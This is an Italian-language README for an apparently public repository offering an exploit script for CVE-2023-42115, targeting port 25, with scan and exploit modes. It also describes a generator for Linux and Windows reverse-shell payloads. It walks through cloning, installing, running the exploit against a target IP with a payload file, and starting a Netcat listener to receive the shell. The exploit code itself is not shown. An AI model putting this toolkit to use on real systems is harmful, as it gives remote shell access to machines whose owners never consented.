
Generatore di exploit e payload reverse shell basato su Python per CVE-2023-42115, con modalità di scansione ed exploit e creazione di payload multipiattaforma.
Questo repository contiene due script Python:
exploit.py: Uno script per sfruttare la vulnerabilità CVE-2023-42115.generate_payload.py: Uno script per generare payload di reverse shell.Prima di eseguire gli script, assicurati di avere Python 3 installato sul tuo sistema.
git clone https://github.com/isotaka134/cve-2023-42115.git
cd cve-2023-42115
Installa le librerie Python richieste usando pip. Esegui il seguente comando per installare tutte le dipendenze necessarie elencate in requirements.txt:
pip install -r requirements.txt
exploit.py
Questo script sfrutta la vulnerabilità CVE-2023-42115.
python exploit.py -t <target_ip> -p <target_port> [options]
Opzioni:
-t: L'indirizzo IP del target.
-p: La porta del servizio target.
Esempio:
python exploit.py -t 192.168.1.10 -p 25 --mode SCAN
python exploit.py -t 192.168.1.10 -p 25 --mode EXPLOIT -f /path/to/payload.sh
generate_payload.py
Questo script genera un payload di reverse shell in base all'input dell'utente.
python generate_payload.py
Passaggi:
Lo script ti chiederà le seguenti informazioni:
A. Tipo di payload ( linux o windows)
B. IP locale: indirizzo per la connessione inversa
C. Porta locale: per la connessione inversa ** I: Se sei dietro un router o stai usando NAT, assicurati di impostare il corretto inoltro delle porte verso il dispositivo su cui è in esecuzione Netcat.**
D. Nome del file di output (ad es., payload.sh per Linux o payload.ps1 per Windows)
Esempio:
python generate_payload.py
Payload Generator
Enter payload type (linux/windows): Linux
Enter local IP address: 127.0.0.1
Enter local port: 4444
Enter output file name (e.g., payload.sh or payload.ps1): Payload.sh
Payload saved to Payload.sh
Devi configurare un listener sulla tua macchina locale per ricevere la reverse shell. Puoi usare Netcat (nc) per questo scopo.
nc -lvnp <YOUR_LOCAL_PORT>
nc -lvnp <YOUR_LOCAL_PORT>
Seguendo questi passaggi, dovresti essere in grado di creare e utilizzare un payload per sfruttare CVE-2023-42115 e ricevere una connessione di reverse shell.
Se hai suggerimenti per miglioramenti o vuoi contribuire, apri una issue o invia una pull request.
Per domande o supporto, contatta